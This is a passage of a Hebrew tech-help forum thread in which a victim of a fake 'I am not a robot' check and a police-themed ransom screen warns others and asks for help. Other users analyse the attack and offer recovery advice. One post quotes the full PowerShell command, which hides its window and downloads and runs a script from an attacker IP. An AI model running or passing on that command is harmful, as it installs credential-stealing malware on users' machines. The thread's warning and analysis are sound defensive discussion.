דילוג לתוכן
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר
עיצובים
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • ברירת מחדל (ללא עיצוב (ברירת מחדל))
  • ללא עיצוב (ברירת מחדל)
כיווץ
מתמחים טופ
  1. דף הבית
  2. מחשבים וטכנולוגיה
  3. עזרה הדדית - מחשבים וטכנולוגיה
  4. שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר

שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר

מתוזמן נעוץ נעול הועבר עזרה הדדית - מחשבים וטכנולוגיה
59 פוסטים 19 כותבים 549 צפיות 20 עוקבים
  • מהישן לחדש
  • מהחדש לישן
  • הכי הרבה הצבעות
תגובה
  • תגובה כנושא
התחברו כדי לפרסם תגובה
נושא זה נמחק. רק משתמשים עם הרשאות מתאימות יוכלו לצפות בו.
  • cfopuserC cfopuser

    @מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
    ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
    בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)

    עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.

    (כמובן הכול בהנחה של התקפה חד פעמית)

    עריכה: דפדפנים כמו https://octobrowser.net/

    די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם

    מתכנת חובבמ מנותק
    מתכנת חובבמ מנותק
    מתכנת חובב
    מדריכים
    כתב נערך לאחרונה על ידי
    #23

    @cfopuser תנועות חשודות יכולות גם להיות מיקום ספציפי שעות מסויימות ביום וטווח IP מסויים

    צריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com

    תגובה 1 תגובה אחרונה
    1
    • cfopuserC cfopuser

      @מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
      ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
      בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)

      עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.

      (כמובן הכול בהנחה של התקפה חד פעמית)

      עריכה: דפדפנים כמו https://octobrowser.net/

      די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם

      מישהו12מ מחובר
      מישהו12מ מחובר
      מישהו12
      מדריכים
      כתב נערך לאחרונה על ידי
      #24

      @cfopuser בנקים זה לא המקומות היחידים שחשובים לנו.

      אפילו הפורום כאן. מה קורה אם מחר פורצים למשתמש ומעלים כאן קבל עם ועדה, מהמשתמש שלו, פרטים אישיים?

      הבלוג שלי
      https://aiv-dev.com/he-IL/

      cfopuserC תגובה 1 תגובה אחרונה
      1
      • מישהו12מ מישהו12

        @cfopuser בנקים זה לא המקומות היחידים שחשובים לנו.

        אפילו הפורום כאן. מה קורה אם מחר פורצים למשתמש ומעלים כאן קבל עם ועדה, מהמשתמש שלו, פרטים אישיים?

        cfopuserC מנותק
        cfopuserC מנותק
        cfopuser
        כתב נערך לאחרונה על ידי
        #25

        @מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
        כמובן לבדוק פרטים ב https://haveibeenpwned.com/
        ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/

        מישהו12מ תגובה 1 תגובה אחרונה
        2
        • י יונימדיה

          אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט 🤖".
          רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
          את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
          מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
          מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
          אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
          תחכימו תלמדו ותזהרו!

          נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות

          D מנותק
          D מנותק
          DANIEL 4
          כתב נערך לאחרונה על ידי
          #26

          @יונימדיה מקווה שעשית כיבוי של המחשב.
          מכאן והלאה - לפרק את הדיסק הפנימי - רק אם יש לך ידע אחרת כדאי להעביר למישהו עם ידע שלא להרוס יותר!

          לחבר למחשב אחר [עדיף לנקי טוטאל שלא יהיה מה שיינזק] לסרוק עם אנטי וירוס עדכני טוב! - ESET לדוגמא
          מסתבר שהוא בע"ה יוכל להסיר את מה שצריך..
          משם והילך לבדוק האם החומר קיים תקין או שהוצפן...
          אם זה קרה האירוע שונה לגמרי.
          תצטרך כנראה לתת הרשאות למערכת הפעלה החדשה שממנה תעבוד מקווה שאתה יודע איך אם לא נשמח לעזור לך
          שיהיה הרבה הצלחה בע"ה

          מישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?

          cfopuserC תגובה 1 תגובה אחרונה
          2
          • cfopuserC cfopuser

            @מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
            כמובן לבדוק פרטים ב https://haveibeenpwned.com/
            ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/

            מישהו12מ מחובר
            מישהו12מ מחובר
            מישהו12
            מדריכים
            כתב נערך לאחרונה על ידי
            #27

            @cfopuser נכון, אבל גם לא לסמוך על מנהל הסיסמאות של כרום.

            כי אז אם פרצו לך למחשב אפשר לגנוב את כל הסיסמאות במכה)

            הבלוג שלי
            https://aiv-dev.com/he-IL/

            תגובה 1 תגובה אחרונה
            0
            • D DANIEL 4

              @יונימדיה מקווה שעשית כיבוי של המחשב.
              מכאן והלאה - לפרק את הדיסק הפנימי - רק אם יש לך ידע אחרת כדאי להעביר למישהו עם ידע שלא להרוס יותר!

              לחבר למחשב אחר [עדיף לנקי טוטאל שלא יהיה מה שיינזק] לסרוק עם אנטי וירוס עדכני טוב! - ESET לדוגמא
              מסתבר שהוא בע"ה יוכל להסיר את מה שצריך..
              משם והילך לבדוק האם החומר קיים תקין או שהוצפן...
              אם זה קרה האירוע שונה לגמרי.
              תצטרך כנראה לתת הרשאות למערכת הפעלה החדשה שממנה תעבוד מקווה שאתה יודע איך אם לא נשמח לעזור לך
              שיהיה הרבה הצלחה בע"ה

              מישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?

              cfopuserC מנותק
              cfopuserC מנותק
              cfopuser
              כתב נערך לאחרונה על ידי
              #28

              @DANIEL-4 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

              מישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?

              לדברים כאלה משתמשים בmirror שנסגר אחרי כמה דקות.
              כנראה info stealer כולשהוא שמנצל את powershell לשימושיו.

              D תגובה 1 תגובה אחרונה
              1
              • cfopuserC cfopuser

                @DANIEL-4 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                מישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?

                לדברים כאלה משתמשים בmirror שנסגר אחרי כמה דקות.
                כנראה info stealer כולשהוא שמנצל את powershell לשימושיו.

                D מנותק
                D מנותק
                DANIEL 4
                כתב נערך לאחרונה על ידי
                #29

                @cfopuser נכון אבל לא תמיד
                בפרט אם זה אתר כה"ג בד"כ זה משתנה רק כל כמה שעות או אם נראה שאנטיוי חוסם..

                cfopuserC תגובה 1 תגובה אחרונה
                0
                • ע מנותק
                  ע מנותק
                  עידו300
                  כתב נערך לאחרונה על ידי
                  #30

                  @mgm-ivr אם מעניין אותך https://mitmachim.top/topic/74608/הסבר-איך-לקבל-וירוס-בצורה-כל-כך-פשוטה-וההסבר-של-התהליך

                  תגובה 1 תגובה אחרונה
                  1
                  • D DANIEL 4

                    @cfopuser נכון אבל לא תמיד
                    בפרט אם זה אתר כה"ג בד"כ זה משתנה רק כל כמה שעות או אם נראה שאנטיוי חוסם..

                    cfopuserC מנותק
                    cfopuserC מנותק
                    cfopuser
                    כתב נערך לאחרונה על ידי
                    #31

                    @DANIEL-4 במקרה הזה הבעלים של האתר קנה חבילה גדולה של seeds מ rapidseedbox.com
                    והשתמש בהם כדי להפיץ את הקובץ.

                    D תגובה 1 תגובה אחרונה
                    1
                    • 9 975

                      ניתוח טכני של הפקודה
                      powershell -wi mi: זהו קיצור מוסווה של הפקודה WindowStyle Hidden. המטרה היא לגרום לחלון ה-PowerShell שייפתח להיעלם מיד מהעין של המשתמש, כדי שהוא לא יבין שרצה תוכנה ברקע.

                      wget (או Invoke-WebRequest): הפקודה פונה לכתובת ה-IP המופיעה שם (84.21.189.170) ומנסה להוריד קובץ בשם clo.txt.

                      למרות שהסיומת היא .txt, זהו למעשה סקריפט של PowerShell שמכיל את הקוד הזדוני האמיתי

                      I am not a bot - Verification ID: #8620: זהו "רעש" שהתוקפים הוסיפו. ה-PowerShell מתעלם מהטקסט הזה כי הוא לא פקודה חוקית, אבל הוא נועד להטעות את המשתמש שמעתיק את הקוד, כדי שיחשוב שזה באמת חלק מתהליך אימות (CAPTCHA).

                      א מנותק
                      א מנותק
                      ארי
                      כתב נערך לאחרונה על ידי
                      #32

                      @975 רק לנסות להבין אם יש לי סינון של נטפרי וכדומה האם אני בעצם מוגן מזה כי אני לא יכול בכלל להתחבר לכתובת של התוקף?

                      D תגובה 1 תגובה אחרונה
                      0
                      • cfopuserC cfopuser

                        @DANIEL-4 במקרה הזה הבעלים של האתר קנה חבילה גדולה של seeds מ rapidseedbox.com
                        והשתמש בהם כדי להפיץ את הקובץ.

                        D מנותק
                        D מנותק
                        DANIEL 4
                        כתב נערך לאחרונה על ידי
                        #33

                        @cfopuser אם כבר סרקת אז מי אני שאשיב אחר ה'מלך'...

                        תגובה 1 תגובה אחרונה
                        0
                        • א ארי

                          @975 רק לנסות להבין אם יש לי סינון של נטפרי וכדומה האם אני בעצם מוגן מזה כי אני לא יכול בכלל להתחבר לכתובת של התוקף?

                          D מנותק
                          D מנותק
                          DANIEL 4
                          כתב נערך לאחרונה על ידי
                          #34

                          @ארי בהרבה מקרים
                          אבל לא תמיד
                          לדוגמא אם האתר פתוח - נשלח מהאתר של התוקף שיש בו כל מיני דברים - בד"כ בכ"ג ESET לדוג' יעלה אזהרה אם מותקן לך אבל לא תמיד..
                          ואז קובץ TXT בכלל לא עובר בדיקה לפני ההורדה...

                          cfopuserC תגובה 1 תגובה אחרונה
                          1
                          • י יונימדיה

                            אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט 🤖".
                            רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
                            את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
                            מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
                            מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
                            אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
                            תחכימו תלמדו ותזהרו!

                            נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות

                            1divid1 מנותק
                            1divid1 מנותק
                            1divid
                            כתב נערך לאחרונה על ידי
                            #35

                            @יונימדיה אפשר לדעת באיזה אתר גלשתה? (איפה שזה קרה)

                            י תגובה 1 תגובה אחרונה
                            0
                            • ע מנותק
                              ע מנותק
                              עידו300
                              כתב נערך לאחרונה על ידי
                              #36

                              אני יכול להסביר לך איך להעלות את המחשב דרך גירסת לייב של לינוקס או כלי טכנאים ואז לנסות להריץ אנטי וירוס משם, לראות מה קרה לקבצים. בפשטות זה לא אמור להפעיל את הוירוס כמדומני.
                              מסכימים איתי?

                              תגובה 1 תגובה אחרונה
                              0
                              • D DANIEL 4

                                @ארי בהרבה מקרים
                                אבל לא תמיד
                                לדוגמא אם האתר פתוח - נשלח מהאתר של התוקף שיש בו כל מיני דברים - בד"כ בכ"ג ESET לדוג' יעלה אזהרה אם מותקן לך אבל לא תמיד..
                                ואז קובץ TXT בכלל לא עובר בדיקה לפני ההורדה...

                                cfopuserC מנותק
                                cfopuserC מנותק
                                cfopuser
                                כתב נערך לאחרונה על ידי
                                #37

                                @DANIEL-4 eset בדרך כלל חוסם דברים כאלה (הרצת סקריפטים דרך run menu)
                                זה שימושי מאוד כדי להגן נגד התקפות בrubber ducky וכדו'
                                אבל גם מועיל מאוד במקרים כאלו.

                                תגובה 1 תגובה אחרונה
                                0
                                • י יונימדיה

                                  @MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
                                  רק אל תנסו להשתמש בו!!!
                                  אני לא לוקח אחריות
                                  .
                                  ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו

                                  powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620

                                  (תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)

                                  י מנותק
                                  י מנותק
                                  יוסי רחמים
                                  כתב נערך לאחרונה על ידי יוסי רחמים
                                  #38

                                  @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                                  ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו

                                  זה פקודה שמושכת מהאתר סקריפט
                                  זה מאוד ידוע השיטה הזאת
                                  מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם...

                                  ע תגובה 1 תגובה אחרונה
                                  1
                                  • י יוסי רחמים

                                    @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                                    ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו

                                    זה פקודה שמושכת מהאתר סקריפט
                                    זה מאוד ידוע השיטה הזאת
                                    מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם...

                                    ע מנותק
                                    ע מנותק
                                    עידו300
                                    כתב נערך לאחרונה על ידי
                                    #39

                                    בתכלס בלי לראות את הקובץ עצמו אין דרך לדעת מה הוא עשה... יתכן שחלק מההרצה זה למחוק אותו.

                                    ניסיתי לשכנע את gpt להוריד אותו ולפענח אבל הוא לא מצליח לגשת אליו...

                                    י תגובה 1 תגובה אחרונה
                                    0
                                    • ע עידו300

                                      בתכלס בלי לראות את הקובץ עצמו אין דרך לדעת מה הוא עשה... יתכן שחלק מההרצה זה למחוק אותו.

                                      ניסיתי לשכנע את gpt להוריד אותו ולפענח אבל הוא לא מצליח לגשת אליו...

                                      י מנותק
                                      י מנותק
                                      יוסי רחמים
                                      כתב נערך לאחרונה על ידי יוסי רחמים
                                      #40

                                      @עידו300 זה לא פעיל עכשיו הפורט הזה

                                      תגובה 1 תגובה אחרונה
                                      0
                                      • cfopuserC מנותק
                                        cfopuserC מנותק
                                        cfopuser
                                        כתב נערך לאחרונה על ידי
                                        #41

                                        @יונימדיה משטרת ישראל על עבירות חוק מהמחשב,

                                        היה נראה הודעות בעברית טבעית? עם לוגו והכול?
                                        מוזר.🤔

                                        בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.

                                        י ע 2 תגובות תגובה אחרונה
                                        0
                                        • cfopuserC cfopuser

                                          @יונימדיה משטרת ישראל על עבירות חוק מהמחשב,

                                          היה נראה הודעות בעברית טבעית? עם לוגו והכול?
                                          מוזר.🤔

                                          בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.

                                          י מנותק
                                          י מנותק
                                          יוסי רחמים
                                          כתב נערך לאחרונה על ידי
                                          #42

                                          @cfopuser כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                                          בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.

                                          קודם שיכבה ויוציא את הקבצים...

                                          תגובה 1 תגובה אחרונה
                                          1

                                          • התחברות

                                          • אין לך חשבון עדיין? הרשמה

                                          • התחברו או הירשמו כדי לחפש.
                                          • פוסט ראשון
                                            פוסט אחרון
                                          0
                                          • חוקי הפורום
                                          • פופולרי
                                          • לא נפתר
                                          • משתמשים
                                          • חיפוש גוגל בפורום
                                          • צור קשר